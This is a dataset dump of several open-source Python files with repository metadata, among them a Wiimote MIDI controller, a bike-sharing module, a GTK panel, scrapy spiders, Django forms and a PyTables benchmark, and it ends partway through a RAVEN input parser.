repo_name
stringlengths 6
61
| path
stringlengths 4
230
| copies
stringlengths 1
3
| size
stringlengths 4
6
| text
stringlengths 1.01k
850k
| license
stringclasses 15
values | hash
int64 -9,220,477,234,079,998,000
9,219,060,020B
| line_mean
float64 11.6
96.6
| line_max
int64 32
939
| alpha_frac
float64 0.26
0.9
| autogenerated
bool 1
class | ratio
float64 1.62
6.1
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
linux-podcasting-hacks/wiimote-recording-control | wiimidi.py | 1 | 5672 | #!/usr/bin/python
import cwiid
import sys
import time
import pypm
from txosc import osc as OSC
from txosc import sync as SYNC
btn_A = 0x0008
btn_one = 0x0002
btn_two = 0x0001
btn_left = 0x0100
btn_right = 0x0200
btn_up = 0x0800
btn_down = 0x0400
btn_minus = 0x0010
btn_plus = 0x1000
btn_home = 0x0080
btn_shoot = 0x0004
class MIDISender:
def __init__(self,device):
self.midi_out = None
for id in range(pypm.CountDevices()):
interf,name,inp,outp,opened = pypm.GetDeviceInfo(id)
if (outp == 1 and name == device):
self.midi_out = pypm.Output(id,0)
break
if self.midi_out == None:
raise Exception("No output device "+device+" found ...")
def mute(self,channel):
print "muting", channel
for v in range(100,0,-2):
self.midi_out.Write([[[0xb0,channel,v],pypm.Time()]])
time.sleep(0.001)
def unmute(self,channel):
print "unmuting", channel
for v in range(0,100,2):
self.midi_out.Write([[[0xb0,channel,v],pypm.Time()]])
time.sleep(0.001)
def play_jingle(self, n):
print "playing jingle", n
self.midi_out.Write([[[0x90,n,127],pypm.Time()]])
time.sleep(0.1)
self.midi_out.Write([[[0x80,n,0],pypm.Time()]])
def stop_jingles(self):
print "stopping jingles"
self.midi_out.Write([[[0xb0,126,127],pypm.Time()]])
time.sleep(0.1)
self.midi_out.Write([[[0xb0,126,0],pypm.Time()]])
# self.midi_out.Write([[[0xb0,channel,0],pypm.Time()]])
class OSCSender:
def __init__(self,host="localhost",port=3819):
self.sender = SYNC.UdpSender(host,port)
def _simple_msg(self,msg):
self.sender.send(OSC.Message(msg))
def add_marker(self):
self._simple_msg("/add_marker")
def rec_prepare(self):
self.sender.send(OSC.Message("/access_action", "Editor/script-action-2"))
def play(self):
self._simple_msg("/transport_play")
def stop(self):
self._simple_msg("/transport_stop")
midi_sender = MIDISender("Midi Through Port-0")
osc_sender = OSCSender()
class WiiButtonState(object):
def __init__(self):
self.button_state = {
btn_A: False,
btn_one: False,
btn_two: False,
btn_left: False,
btn_right: False,
btn_up: False,
btn_down: False,
btn_minus: False,
btn_plus: False,
btn_home: False,
btn_shoot: False
}
self.button_funcs = {}
def callback(self,messages,time):
for msgType, msgContent in messages:
if msgType != cwiid.MESG_BTN:
continue
self.buttonEvent(msgContent)
def buttonEvent(self,state):
for btn,old_state in self.button_state.items():
new_state = state & btn
if new_state != old_state:
self.button_state[btn] = new_state
if btn in self.button_funcs:
press_func, rel_func = self.button_funcs[btn]
if new_state:
press_func()
else:
rel_func()
class MutingWii(WiiButtonState):
def __init__(self,mutingChannel):
super(MutingWii,self).__init__()
self.mutingChannel = mutingChannel
self.button_funcs[btn_shoot] = (self.mute,self.unmute)
def mute(self):
self.device.led = cwiid.LED1_ON
midi_sender.mute(self.mutingChannel)
def unmute(self):
self.device.led = 0
midi_sender.unmute(self.mutingChannel)
class MasterWii(MutingWii):
def __init__(self,mutingChannel):
super(MasterWii,self).__init__(mutingChannel)
self.button_funcs[btn_one] = (self.jingle1_play,self.leds_off)
self.button_funcs[btn_two] = (self.jingle2_play,self.leds_off)
self.button_funcs[btn_home] = (self.rec_prepare,self.leds_off)
self.button_funcs[btn_A] = (self.set_mark,self.leds_off)
self.button_funcs[btn_up] = (self.play,self.leds_off)
self.button_funcs[btn_down] = (self.stop,self.leds_off)
def jingle1_play(self):
print "Jingle1 play"
self.device.led = cwiid.LED2_ON
midi_sender.play_jingle(0)
def jingle2_play(self):
print "Jingle2 play"
self.device.led = cwiid.LED2_ON
midi_sender.play_jingle(1)
def jingles_stop(self):
midi_sender.stop_jingles()
def rec_prepare(self):
print "Recplay"
self.device.led = cwiid.LED3_ON
osc_sender.rec_prepare()
def play(self):
osc_sender.play()
def stop(self):
osc_sender.stop()
def set_mark(self):
print "Set mark"
self.device.led = cwiid.LED4_ON
osc_sender.add_marker()
def leds_off(self):
self.device.led = 0
def do_nothing():
pass
execfile('device_config')
def make_connections(conns):
for id,instance in devices.items():
if id in conns:
continue
print "Connecting", id,
try:
wiimote = cwiid.Wiimote(id)
print "success",
wiimote.rpt_mode = cwiid.RPT_BTN
print "report buttons",
wiimote.mesg_callback = instance.callback
instance.device = wiimote
wiimote.enable(cwiid.FLAG_MESG_IFC)
conns.append(id)
except:
print "failed"
return conns
if __name__ == "__main__":
conns = []
while True:
make_connections(conns)
time.sleep(1)
| bsd-2-clause | 2,697,744,012,294,002,000 | 26.269231 | 81 | 0.565585 | false | 3.25043 | false | false | false |
nojhan/weboob-devel | modules/jcvelaux/module.py | 7 | 5806 | # -*- coding: utf-8 -*-
# Copyright(C) 2013 dud
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
from weboob.tools.backend import Module, BackendConfig
from weboob.capabilities.base import StringField
from weboob.capabilities.gauge import CapGauge, GaugeSensor, Gauge, GaugeMeasure, SensorNotFound
from weboob.tools.value import Value
from weboob.tools.ordereddict import OrderedDict
from .browser import VelibBrowser
__all__ = ['jcvelauxModule']
SENSOR_TYPES = OrderedDict(((u'available_bikes', u'Available bikes'),
(u'available_bike_stands', u'Free stands'),
(u'bike_stands', u'Total stands')))
CITIES = ("Paris", "Rouen", "Toulouse", "Luxembourg", "Valence", "Stockholm",
"Goteborg", "Santander", "Amiens", "Lillestrom", "Mulhouse", "Lyon",
"Ljubljana", "Seville", "Namur", "Nancy", "Creteil", "Bruxelles-Capitale",
"Cergy-Pontoise", "Vilnius", "Toyama", "Kazan", "Marseille", "Nantes",
"Besancon")
class BikeMeasure(GaugeMeasure):
def __repr__(self):
return '<GaugeMeasure level=%d>' % self.level
class BikeSensor(GaugeSensor):
longitude = StringField('Longitude of the sensor')
latitude = StringField('Latitude of the sensor')
class jcvelauxModule(Module, CapGauge):
NAME = 'jcvelaux'
DESCRIPTION = (u'City bike renting availability information.\nCities: %s' %
u', '.join(CITIES))
MAINTAINER = u'Herve Werner'
EMAIL = '[email protected]'
VERSION = '1.1'
LICENSE = 'AGPLv3'
BROWSER = VelibBrowser
STORAGE = {'boards': {}}
CONFIG = BackendConfig(Value('city', label='City', default='Paris',
choices=CITIES + ("ALL",)))
def __init__(self, *a, **kw):
super(jcvelauxModule, self).__init__(*a, **kw)
self.cities = None
def _make_gauge(self, info):
gauge = Gauge(info['id'])
gauge.name = unicode(info['name'])
gauge.city = unicode(info['city'])
gauge.object = u'bikes'
return gauge
def _make_sensor(self, sensor_type, info, gauge):
id = '%s.%s' % (sensor_type, gauge.id)
sensor = BikeSensor(id)
sensor.gaugeid = gauge.id
sensor.name = SENSOR_TYPES[sensor_type]
sensor.address = unicode(info['address'])
sensor.longitude = info['longitude']
sensor.latitude = info['latitude']
sensor.history = []
return sensor
def _make_measure(self, sensor_type, info):
measure = BikeMeasure()
measure.date = info['last_update']
measure.level = float(info[sensor_type])
return measure
def _parse_gauge(self, info):
gauge = self._make_gauge(info)
gauge.sensors = []
for type in SENSOR_TYPES:
sensor = self._make_sensor(type, info, gauge)
measure = self._make_measure(type, info)
sensor.lastvalue = measure
gauge.sensors.append(sensor)
return gauge
def _contract(self):
contract = self.config.get('city').get()
if contract.lower() == 'all':
contract = None
return contract
def iter_gauges(self, pattern=None):
if pattern is None:
for jgauge in self.browser.get_station_list(contract=self._contract()):
yield self._parse_gauge(jgauge)
else:
lowpattern = pattern.lower()
for jgauge in self.browser.get_station_list(contract=self._contract()):
gauge = self._parse_gauge(jgauge)
if lowpattern in gauge.name.lower() or lowpattern in gauge.city.lower():
yield gauge
def iter_sensors(self, gauge, pattern=None):
if not isinstance(gauge, Gauge):
gauge = self._get_gauge_by_id(gauge)
if gauge is None:
raise SensorNotFound()
if pattern is None:
for sensor in gauge.sensors:
yield sensor
else:
lowpattern = pattern.lower()
for sensor in gauge.sensors:
if lowpattern in sensor.name.lower():
yield sensor
def get_last_measure(self, sensor):
if not isinstance(sensor, GaugeSensor):
sensor = self._get_sensor_by_id(sensor)
if sensor is None:
raise SensorNotFound()
return sensor.lastvalue
def _fetch_cities(self):
if self.cities:
return
self.cities = {}
jcontract = self.browser.get_contracts_list()
for jcontract in jcontract:
for city in jcontract['cities']:
self.cities[city.lower()] = jcontract['name']
def _get_gauge_by_id(self, id):
jgauge = self.browser.get_station_infos(id)
if jgauge:
return self._parse_gauge(jgauge)
else:
return None
def _get_sensor_by_id(self, id):
_, gauge_id = id.split('.', 1)
gauge = self._get_gauge_by_id(gauge_id)
if not gauge:
raise SensorNotFound()
for sensor in gauge.sensors:
if sensor.id.lower() == id.lower():
return sensor
| agpl-3.0 | 2,546,773,381,831,487,500 | 32.755814 | 96 | 0.603514 | false | 3.75307 | false | false | false |
ktosiek/spanel | main.py | 1 | 3260 | #!/usr/bin/env python
# Copyright 2012 Tomasz Kontusz
#
# This file is part of Spanel.
#
# Spanel is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Spanel is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Spanel. If not, see <http://www.gnu.org/licenses/>.
import argparse
import logging
import sys
import threading
import gtk
import gobject
import dbus
import dbus.service
from dbus.mainloop.glib import DBusGMainLoop
from utils import Enum, GdkLock
# setting DEBUG for pre-main initialization, it will be changed in main()
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
height = 16
Positions = Enum(('TOP', 'BOTTOM'))
class PanelWindow(gtk.Window):
def __init__(self, position=Positions.TOP, widgets=[]):
super(PanelWindow, self).__init__(gtk.WINDOW_TOPLEVEL)
self.set_default_size(gtk.gdk.screen_width(), height)
self.set_type_hint(gtk.gdk.WINDOW_TYPE_HINT_DOCK)
self._box = gtk.HBox()
self.add(self._box)
self.setup_widgets(widgets)
self.show_all()
for w, _ in widgets: # TODO: create widget protocol
if hasattr(w, 'on_visible'):
w.on_visible()
if position == Positions.TOP:
self.move(0, 0)
self.window.property_change("_NET_WM_STRUT", "CARDINAL", 32,
gtk.gdk.PROP_MODE_REPLACE, [0, height, 0, 0])
elif position == Positions.BOTTOM:
self.move(0, gtk.gdk.screen_height()-height)
self.window.property_change("_NET_WM_STRUT", "CARDINAL", 32,
gtk.gdk.PROP_MODE_REPLACE, [0, 0, 0, height])
def setup_widgets(self, widgets):
default_kwargs = {
'expand': False
}
for widget, w_kwargs in widgets:
kwargs = default_kwargs.copy()
kwargs.update(w_kwargs)
self._box.pack_start(widget, **kwargs)
def main():
logger.info('loading configuration')
import conf
debug_levels = ['DEBUG', 'INFO', 'WARNING', 'ERROR']
parser = argparse.ArgumentParser(
description="Simple panel written in Python for holding widgets")
parser.add_argument('--verbosity', '-v', dest='verbosity',
choices=debug_levels, default=None)
args = parser.parse_args()
level = args.verbosity or getattr(conf, 'VERBOSITY', 'INFO')
if level not in debug_levels:
logger.critical('Log level %s not supported!', level)
return 1
logging.basicConfig(level=level)
logger.info('creating panel')
app = PanelWindow(position=getattr(conf, 'POSITION', None),
widgets=getattr(conf, 'WIDGETS', []))
logger.info('starting main loop')
gtk.gdk.threads_init()
with GdkLock():
gtk.main()
if __name__ == '__main__':
main()
| gpl-3.0 | 4,020,006,616,475,242,000 | 30.650485 | 73 | 0.645092 | false | 3.821805 | false | false | false |
jasonzou/MyPapers | libs/citepro/citeproc/formatter/html.py | 1 | 1474 |
from cgi import escape
def preformat(text):
return escape(str(text))
class TagWrapper(str):
tag = None
attributes = None
@classmethod
def _wrap(cls, text):
if cls.attributes:
attrib = ' ' + ' '.join(['{}="{}"'.format(key, value)
for key, value in cls.attributes.items()])
else:
attrib = ''
return '<{tag}{attrib}>{text}</{tag}>'.format(tag=cls.tag,
attrib=attrib,text=text)
def __new__(cls, text):
return super().__new__(cls, cls._wrap(text))
class Italic(TagWrapper):
tag = 'i'
class Oblique(Italic):
pass
class Bold(TagWrapper):
tag = 'b'
class Light(TagWrapper):
tag = 'l'
class Underline(TagWrapper):
tag = 'u'
class Superscript(TagWrapper):
tag = 'sup'
class Subscript(TagWrapper):
tag = 'sub'
class SmallCaps(TagWrapper):
tag = 'span'
attributes = {'style': 'font-variant:small-caps;'}
class Bibliography(str):
bib_prefix = '<div class="csl-bib-body">'
bib_suffix = '</div>'
item_prefix = ' <div class="csl-entry">'
item_suffix = '</div>'
def __new__(cls, items):
output = [cls.bib_prefix]
for text in items:
text = cls.item_prefix + str(text) + cls.item_suffix
output.append(text)
output.append(cls.bib_suffix)
return super().__new__(cls, '\n'.join(output))
| mit | -1,419,586,216,385,512,400 | 19.760563 | 79 | 0.539349 | false | 3.534772 | false | false | false |
pculture/unisubs | apps/search/templatetags/search_tags.py | 7 | 1935 | # Amara, universalsubtitles.org
#
# Copyright (C) 2013 Participatory Culture Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see
# http://www.gnu.org/licenses/agpl-3.0.html.
from django import template
from django.db.models.query import QuerySet
from django.db.models import Model
from search.forms import SearchForm
from videos.models import Video
register = template.Library()
@register.inclusion_tag('search/_search_form.html', takes_context=True)
def search_form(context, form=None, simple=False):
return {
'simple': simple,
'form': form or SearchForm()
}
@register.simple_tag
def load_related_for_result(search_qs):
#should be fixed in future if result will contain not only Video
from videos.models import SubtitleLanguage
videos = []
for obj in search_qs:
if not obj:
continue
if isinstance(obj, Model):
videos.append((obj.id, obj))
else:
videos.append((obj.object.id, obj.object))
videos = dict(videos)
langs_qs = SubtitleLanguage.objects.select_related('video', 'last_version').filter(video__id__in=videos.keys())
if videos:
for v in videos.values():
v.langs_cache = []
for l in langs_qs:
videos[l.video_id].langs_cache.append(l)
return ''
| agpl-3.0 | 4,795,282,936,675,541,000 | 30.209677 | 115 | 0.685788 | false | 3.924949 | false | false | false |
ddy88958620/lib | Python/scrapy/sagemcom/cometcouk.py | 2 | 4261 | __author__ = 'juraseg'
from scrapy.spider import BaseSpider
from scrapy.selector import HtmlXPathSelector
from scrapy.http import Request
from product_spiders.items import Product, ProductLoader
import logging
class ComeCoUkSpider(BaseSpider):
name = 'comet.co.uk'
allowed_domains = ['comet.co.uk']
start_urls = (
'http://www.comet.co.uk/',
)
search_url = 'http://www.comet.co.uk/webapp/wcs/stores/servlet/SearchResultsDisplayView?storeId=10151&catalogId=10002&langId=-1&searchTerm='
keywords = ['Sagemcom', 'Sagem']
products = [
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-HDR-FOX-T2-Freeview-freesat-Recorder/680052',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-HDR-FOX-T2/1TB-Freeview-freesat-Recorder/735736',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-FOXSAT-HDR500-Freeview-freesat-Recorder/712930',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-PANASONIC-DMR-HW100EBK-Freeview-freesat-Recorder/767913',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SAMSUNG-SMT-S7800-Freeview-freesat-Recorder/701467',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SAGEMCOM-RTI90-320-Freeview-freesat-Recorder/621994',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-PVR9300T/500-Freeview-freesat-Recorder/787388',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SONY-SVRHDT500B.CEK-Freeview-freesat-Recorder/700665',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SAGEMCOM-RTI95-320-Freeview-freesat-Recorder/664121',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-PHILIPS-HDTP8530-Freeview-freesat-Recorder/600339',
]
def start_requests(self):
for keyword in self.keywords:
url = self.search_url + keyword
request = Request(url, callback=self.parse_search)
yield request
for url in self.products:
yield Request(url, callback=self.parse_product)
def parse_product(self, response):
hxs = HtmlXPathSelector(response)
url = response.url
name = hxs.select("//div[@id='product-content']//div[@id='product-header']/h1//text()").extract()
if not name:
logging.error("ERROR! NO NAME! %s" % url)
return
name = " ".join(name)
price = hxs.select("//div[@id='product-content']//div[@id='productPrice']//p[@id='product-price']/text()").extract()
if not price:
logging.error("ERROR! NO PRICE! %s %s" % (url, name))
return
price = price[0]
l = ProductLoader(item=Product(), response=response)
l.add_value('identifier', name)
l.add_value('name', name)
l.add_value('url', url)
l.add_value('price', price)
yield l.load_item()
def parse_search(self, response):
hxs = HtmlXPathSelector(response)
# parse pages
pages = hxs.select("//ul[@id='pagination']/li/a/@href").extract()
for page in pages:
request = Request(page, callback=self.parse_search)
yield request
# parse products
items = hxs.select("//div[@class='column_one grid_list']/div")
for item in items:
name = item.select("div/div[@class='info']/div/h2/a/text()").extract()
if not name:
continue
name = name[0]
url = item.select("div/div[@class='info']/div/h2/a/@href").extract()
if not url:
logging.error("ERROR! NO URL! URL: %s. NAME: %s" % (response.url, name))
continue
url = url[0]
price = item.select("div/div[@class='pricebox']/p[@id='product-price']/text()").extract()
if not price:
logging.error("ERROR! NO PRICE! URL: %s. NAME: %s" % (response.url, name))
continue
price = price[0]
l = ProductLoader(item=Product(), response=response)
l.add_value('identifier', name)
l.add_value('name', name)
l.add_value('url', url)
l.add_value('price', price)
yield l.load_item()
| apache-2.0 | 2,599,687,918,353,932,000 | 41.188119 | 144 | 0.615349 | false | 3.126192 | false | false | false |
atodorov/anaconda | pyanaconda/modules/payloads/source/factory.py | 1 | 1945 | #
# Factory class to create sources.
#
# Copyright (C) 2020 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
from pyanaconda.modules.payloads.constants import SourceType
__all__ = ["SourceFactory"]
class SourceFactory(object):
"""Factory to create payload sources."""
@staticmethod
def create_source(source_type: SourceType):
"""Create a source module.
:param source_type: a source type
:return: a source module
"""
if source_type == SourceType.LIVE_OS_IMAGE:
from pyanaconda.modules.payloads.source.live_os.live_os import LiveOSSourceModule
return LiveOSSourceModule()
elif source_type == SourceType.CDROM:
from pyanaconda.modules.payloads.source.cdrom.cdrom import CdromSourceModule
return CdromSourceModule()
if source_type == SourceType.HMC:
from pyanaconda.modules.payloads.source.hmc.hmc import HMCSourceModule
return HMCSourceModule()
raise ValueError("Unknown source type: {}".format(source_type))
| gpl-2.0 | -9,087,149,336,753,001,000 | 41.282609 | 93 | 0.720823 | false | 4.182796 | false | false | false |
gdementen/PyTables | bench/optimal-chunksize.py | 13 | 3822 | """Small benchmark on the effect of chunksizes and compression on HDF5 files.
Francesc Alted
2007-11-25
"""
from __future__ import print_function
import os
import math
import subprocess
import tempfile
from time import time
import numpy
import tables
# Size of dataset
# N, M = 512, 2**16 # 256 MB
# N, M = 512, 2**18 # 1 GB
# N, M = 512, 2**19 # 2 GB
N, M = 2000, 1000000 # 15 GB
# N, M = 4000, 1000000 # 30 GB
datom = tables.Float64Atom() # elements are double precision
def quantize(data, least_significant_digit):
"""Quantize data to improve compression.
data is quantized using around(scale*data)/scale, where scale is
2**bits, and bits is determined from the least_significant_digit.
For example, if least_significant_digit=1, bits will be 4.
"""
precision = 10. ** -least_significant_digit
exp = math.log(precision, 10)
if exp < 0:
exp = int(math.floor(exp))
else:
exp = int(math.ceil(exp))
bits = math.ceil(math.log(10. ** -exp, 2))
scale = 2. ** bits
return numpy.around(scale * data) / scale
def get_db_size(filename):
sout = subprocess.Popen("ls -sh %s" % filename, shell=True,
stdout=subprocess.PIPE).stdout
line = [l for l in sout][0]
return line.split()[0]
def bench(chunkshape, filters):
numpy.random.seed(1) # to have reproductible results
filename = tempfile.mktemp(suffix='.h5')
print("Doing test on the file system represented by:", filename)
f = tables.open_file(filename, 'w')
e = f.create_earray(f.root, 'earray', datom, shape=(0, M),
filters = filters,
chunkshape = chunkshape)
# Fill the array
t1 = time()
for i in range(N):
# e.append([numpy.random.rand(M)]) # use this for less compressibility
e.append([quantize(numpy.random.rand(M), 6)])
# os.system("sync")
print("Creation time:", round(time() - t1, 3), end=' ')
filesize = get_db_size(filename)
filesize_bytes = os.stat(filename)[6]
print("\t\tFile size: %d -- (%s)" % (filesize_bytes, filesize))
# Read in sequential mode:
e = f.root.earray
t1 = time()
# Flush everything to disk and flush caches
#os.system("sync; echo 1 > /proc/sys/vm/drop_caches")
for row in e:
t = row
print("Sequential read time:", round(time() - t1, 3), end=' ')
# f.close()
# return
# Read in random mode:
i_index = numpy.random.randint(0, N, 128)
j_index = numpy.random.randint(0, M, 256)
# Flush everything to disk and flush caches
#os.system("sync; echo 1 > /proc/sys/vm/drop_caches")
# Protection against too large chunksizes
# 4 MB
if 0 and filters.complevel and chunkshape[0] * chunkshape[1] * 8 > 2 ** 22:
f.close()
return
t1 = time()
for i in i_index:
for j in j_index:
t = e[i, j]
print("\tRandom read time:", round(time() - t1, 3))
f.close()
# Benchmark with different chunksizes and filters
# for complevel in (0, 1, 3, 6, 9):
for complib in (None, 'zlib', 'lzo', 'blosc'):
# for complib in ('blosc',):
if complib:
filters = tables.Filters(complevel=5, complib=complib)
else:
filters = tables.Filters(complevel=0)
print("8<--" * 20, "\nFilters:", filters, "\n" + "-" * 80)
# for ecs in (11, 14, 17, 20, 21, 22):
for ecs in range(10, 24):
# for ecs in (19,):
chunksize = 2 ** ecs
chunk1 = 1
chunk2 = chunksize / datom.itemsize
if chunk2 > M:
chunk1 = chunk2 / M
chunk2 = M
chunkshape = (chunk1, chunk2)
cs_str = str(chunksize / 1024) + " KB"
print("***** Chunksize:", cs_str, "/ Chunkshape:", chunkshape, "*****")
bench(chunkshape, filters)
| bsd-3-clause | -8,520,421,271,985,768,000 | 29.333333 | 79 | 0.591575 | false | 3.300518 | false | false | false |
platinummonkey/Vizwall-Website | vizwall/events/forms.py | 1 | 5287 | from django.forms import *
from django.forms.widgets import *
from django.forms.extras.widgets import *
from vizwall.events.models import Event, COMPONENT_CHOICES, dTimeFieldInputs
import datetime
from vizwall.accounts.models import UserProfile
from captcha.fields import CaptchaField
class EventForm(ModelForm):
'''Event form, customized to show normal Anonymous view'''
event_date = DateTimeField(required=True, initial=None, input_formats=dTimeFieldInputs, help_text='Please use the date selector and check the calendar for available times!')
captcha = CaptchaField()
class Meta:
model = Event
#fields = ()
exclude=('event_last_modified', 'event_req_date',
'event_pub_date', 'event_is_published', 'event_assigned_proctors',
'event_is_declined')
widgets = {
'event_detail': Textarea(attrs={'cols':35, 'rows': 5}),
'event_components_vizwall': CheckboxInput(),
'event_components_3dtv': CheckboxInput(),
'event_components_omni': CheckboxInput(),
'event_components_hd2': CheckboxInput(),
'event_components_smart': CheckboxInput(),
}
def __init__(self, *args, **kwargs):
self.event_id = kwargs.pop('event_id') if kwargs.get('event_id') else None
super(EventForm, self).__init__(*args, **kwargs)
def clean_event_component_vizwall(self):
if self.cleaned_data['event_component_vizwall']:
return True
return False
def clean_event_component_omni(self):
if self.cleaned_data['event_component_omni']:
return True
return False
def clean_event_component_3dtv(self):
if self.cleaned_data['event_component_3dtv']:
return True
return False
def clean_event_component_hd2(self):
if self.cleaned_data['event_component_hd2']:
return True
return False
def clean_event_component_smart(self):
if self.cleaned_data['event_component_smart']:
return True
return False
def clean_event_date(self):
''' Checks requested date against any current events for conflicts
raises an error if another published event exists, else passes validation'''
reqDate = self.cleaned_data['event_date']
reqDuration = self.cleaned_data['event_duration']
conflict = self.checkConflict(reqDate, reqDuration)
if conflict and conflict.pk != self.event_id:
raise forms.ValidationError("This event Conflicts with another event: \"%s\" between %s-%s - ID# %s" % ('\n'+conflict.event_title, conflict.event_date.strftime('%H:%M'), conflict.get_end_date().strftime('%H:%M'), conflict.pk))
# always return the cleaned data, whether it was changed or not
return reqDate
def inRange(self,begin,duration,eventStart,eventDuration):
''' Checks if date ranges overlap - pads 1 minute off end times'''
end = begin + datetime.timedelta(minutes=duration-1)
eventEnd = eventStart + datetime.timedelta(minutes=int(eventDuration)-1)
#print begin, end
#print eventStart, eventEnd
isInRange = begin <= eventStart <= end or begin <= eventEnd <= end
return isInRange
def checkConflict(self, reqDate, reqDuration):
'''checks current scheduled and published events if there is a conflict '''
tom = reqDate+datetime.timedelta(days=2) # make sure full day tomorrow is included
if self.event_id:
print "event_id given"
daysEvents = Event.objects.all().filter(
event_date__gte=datetime.date(reqDate.year,reqDate.month,reqDate.day),
event_date__lte=datetime.date(tom.year,tom.month,tom.day),
event_is_published=True).exclude(pk=self.event_id)
print daysEvents
else:
print "event_id not given"
daysEvents = Event.objects.all().filter(
event_date__gte=datetime.date(reqDate.year,reqDate.month,reqDate.day),
event_date__lte=datetime.date(tom.year,tom.month,tom.day),
event_is_published=True)
if daysEvents:
for event in daysEvents:
if self.inRange(event.event_date, event.event_duration, reqDate, reqDuration):
# conflict exists, return with conflicting event (~bool True)
return event
# no conflicts, valid event time, return with nothing (~bool False)
return False
class DynamicMultipleChoiceField(MultipleChoiceField):
''' Removes default django validation that values are in choices option '''
def validate(self, value):
if self.required and not value:
raise forms.ValidationError(self.error_messages['required'])
class EventFormAdmin(EventForm):
class Meta:
model=Event
exclude=('event_pub_date', 'event_req_date', 'event_last_modified', 'event_assigned_proctors', 'captcha')
widgets = {
'event_detail': Textarea(attrs={'cols':35, 'rows':5}),
'event_components_vizwall': CheckboxInput(),
'event_components_3dtv': CheckboxInput(),
'event_components_omni': CheckboxInput(),
'event_components_hd2': CheckboxInput(),
'event_components_smart': CheckboxInput(),
'event_is_published': CheckboxInput(),
'event_is_declined': CheckboxInput(),
}
# representing the manytomany related field in Event
proctors = DynamicMultipleChoiceField(required=False)
def clean_proctors(self):
return self.cleaned_data['proctors']
| gpl-3.0 | -4,722,789,321,356,158,000 | 40.960317 | 232 | 0.687535 | false | 3.861943 | false | false | false |
idaholab/raven | framework/CodeInterfaces/Generic/GenericParser.py | 2 | 10797 | # Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Created on Mar 10, 2015
@author: talbpaul
"""
from __future__ import division, print_function, unicode_literals, absolute_import
import os
import sys
import numpy as np
from utils import mathUtils
# numpy with version 1.14.0 and upper will change the floating point type and print
# https://docs.scipy.org/doc/numpy-1.14.0/release.html
if int(np.__version__.split('.')[1]) > 13:
np.set_printoptions(**{'legacy':'1.13'})
def _reprIfFloat(value):
"""
Uses repr if the value is a float
@ In, value, any, the value to convert to a string
@ Out, _reprIfFloat, string, a string conversion of this
"""
if mathUtils.isAFloat(value):
return repr(value)
else:
return str(value)
class GenericParser():
"""
import the user-edited input file, build list of strings with replacable parts
"""
def __init__(self,inputFiles,prefix='$RAVEN-',postfix='$',defaultDelim=':', formatDelim='|'):
"""
Accept the input file and parse it by the prefix-postfix breaks. Someday might be able to change prefix,postfix,defaultDelim from input file, but not yet.
@ In, inputFiles, list, string list of input filenames that might need parsing.
@ In, prefix, string, optional, the string prefix to find input variables within the input files
@ In, postfix, string, optional, the string postfix signifying hte end of an input variable within an input file
@ In, defaultDelim, string, optional, the string used between prefix and postfix to set default values
@ In, formatDelim, string, optional, the string used between prefix and postfix to set the format of the value
@ Out, None
"""
self.inputFiles = inputFiles
self.prefixKey=prefix
self.postfixKey=postfix
self.varPlaces = {} # varPlaces[var][inputFile]
self.defaults = {} # defaults[var][inputFile]
self.formats = {} # formats[var][inputFile]
self.acceptFormats = {"d":int,"e":float,"E":float,"f":float,"F":float,"g":float,"G":float}
self.segments = {} # segments[inputFile]
self.printTag = 'GENERIC_PARSER'
for inputFile in self.inputFiles:
infileName = inputFile.getFilename()#os.path.basename(inputFile)
